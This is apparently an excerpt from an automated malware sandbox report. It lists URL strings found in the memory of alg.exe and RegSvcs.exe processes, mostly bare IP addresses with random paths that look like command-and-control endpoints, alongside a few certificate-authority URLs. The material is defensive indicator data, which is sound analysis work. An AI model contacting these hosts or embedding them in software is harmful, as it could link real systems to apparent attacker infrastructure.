              Source: alg.exe, 0000000D.00000003.2210269453.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/opP
              Source: alg.exe, 0000000D.00000003.2259482527.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2267339346.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/shrlpi
              Source: alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/shrlpiinieee
              Source: alg.exe, 0000000D.00000003.2179969488.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2210269453.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2080646306.000000000050F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2124390441.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/wpnrqhmpnuisgi
              Source: alg.exe, 0000000D.00000003.2068786844.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/
              Source: alg.exe, 0000000D.00000003.2016629204.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046169214.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2026221908.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2041235754.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/ayiycmrfnan
              Source: alg.exe, 0000000D.00000003.2025611759.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/ayiycmrfnan-
              Source: alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2065019404.000000000050F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2124390441.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/cuxawpwbnkhn
              Source: alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/cuxawpwbnkhnM
              Source: alg.exe, 0000000D.00000003.2179969488.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2210269453.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2124390441.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/cuxawpwbnkhnU
              Source: alg.exe, 0000000D.00000003.2065019404.000000000050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/cuxawpwbnkhns#$u
              Source: alg.exe, 0000000D.00000003.2069852108.000000000050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/jttp
              Source: alg.exe, 0000000D.00000003.2089955706.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2125759526.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/jttpg
              Source: alg.exe, 0000000D.00000003.1983866160.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/kqipv(
              Source: alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/mgwvuleuoxgka
              Source: alg.exe, 0000000D.00000003.2288608476.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2267339346.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/mgwvuleuoxgkaL
              Source: alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/mgwvuleuoxgkarue
              Source: alg.exe, 0000000D.00000003.2040810220.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34:80/if8
              Source: alg.exe, 0000000D.00000003.1972777177.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.227.7.138/ljnlowtt
              Source: alg.exe, 0000000D.00000003.2040810220.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.227.7.138:80/ljnlowt
              Source: alg.exe, 0000000D.00000003.1966658212.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1973326884.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/rrvggovttpevpbe
              Source: alg.exe, 0000000D.00000003.2025611759.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/xtqnbvhp
              Source: alg.exe, 0000000D.00000003.2025611759.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032923896.0000000000538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/xtqnbvhpX
              Source: alg.exe, 0000000D.00000003.2125759526.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2144486551.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/edke
              Source: alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2025611759.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046169214.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/kkcqqeuyeyu
              Source: alg.exe, 0000000D.00000003.2016629204.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046169214.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2026221908.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2041235754.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/kkcqqeuyeyuuhTf
              Source: alg.exe, 0000000D.00000003.1914053502.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914915915.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/yxchsqwoy
              Source: alg.exe, 0000000D.00000003.1529626183.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/exyejkfqnn:
              Source: alg.exe, 0000000D.00000003.1917967381.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914053502.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/yxchsqwoyP
              Source: alg.exe, 0000000D.00000003.1893684140.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1892475238.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
              Source: alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/aywxxumeinieee
              Source: alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/aywxxumeinieee-
              Source: alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/aywxxumeinieeeJ
              Source: alg.exe, 0000000D.00000003.1892475238.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/dnmpvtql
              Source: alg.exe, 0000000D.00000003.1892690377.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/dnmpvtql
              Source: alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
              Source: alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/T
              Source: alg.exe, 0000000D.00000003.1489265743.000000000050C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1493620638.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/iqhmiklhuwbcg
              Source: alg.exe, 0000000D.00000003.2179969488.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2210269453.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2124390441.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/jqlotfcyykbfgsp
              Source: alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/p
              Source: alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/t
              Source: alg.exe, 0000000D.00000003.2017070889.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/vipn(
              Source: alg.exe, 0000000D.00000003.2090939732.000000000050F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2108245828.000000000050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/xhfpy
              Source: alg.exe, 0000000D.00000003.2090939732.000000000050F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2108245828.000000000050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/xhfpybfgsp7$a
              Source: alg.exe, 0000000D.00000003.2089955706.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/xhfpyt
              Source: alg.exe, 0000000D.00000003.1521291058.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/fmwgjknn:
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpk
              Source: alg.exe, 0000000D.00000003.1999368202.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpkc
              Source: alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpkexe
              Source: alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpkqlbauh
              Source: alg.exe, 0000000D.00000003.1966658212.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957847112.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpkt
              Source: alg.exe, 0000000D.00000003.2046169214.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2181291982.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2089955706.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2200527185.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2125759526.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2163395398.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2025611759.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2229080820.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2246556685.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/yhikx
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1553956256.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/enP
              Source: alg.exe, 0000000D.00000003.1543980844.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/gedtsq
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/xrkixnpk
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944621326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/yhikx
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1790563475.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1790699822.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/aopfhnckuovs
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/c
              Source: alg.exe, 0000000D.00000003.1838038969.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/fkj
              Source: alg.exe, 0000000D.00000003.1838038969.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/fkjgs
              Source: alg.exe, 0000000D.00000003.1878733120.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/mtrjsdrytjxvslm
              Source: alg.exe, 0000000D.00000003.1878733120.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/mtrjsdrytjxvslm#$u
              Source: alg.exe, 0000000D.00000003.1798107286.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1838038969.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/reeuv
              Source: alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/reeuv#$u
              Source: RegSvcs.exe, 00000008.00000002.1601150507.000000000120D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1601150507.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/wt
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/aopfhnckuovs
              Source: alg.exe, 0000000D.00000003.1838038969.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/fkjv
              Source: alg.exe, 0000000D.00000003.1914053502.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1892690377.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1878733120.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907846105.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/mtrjsdrytjxvslmP
              Source: alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/reeuv
              Source: RegSvcs.exe, 00000008.00000002.1601150507.000000000120D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/wt
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
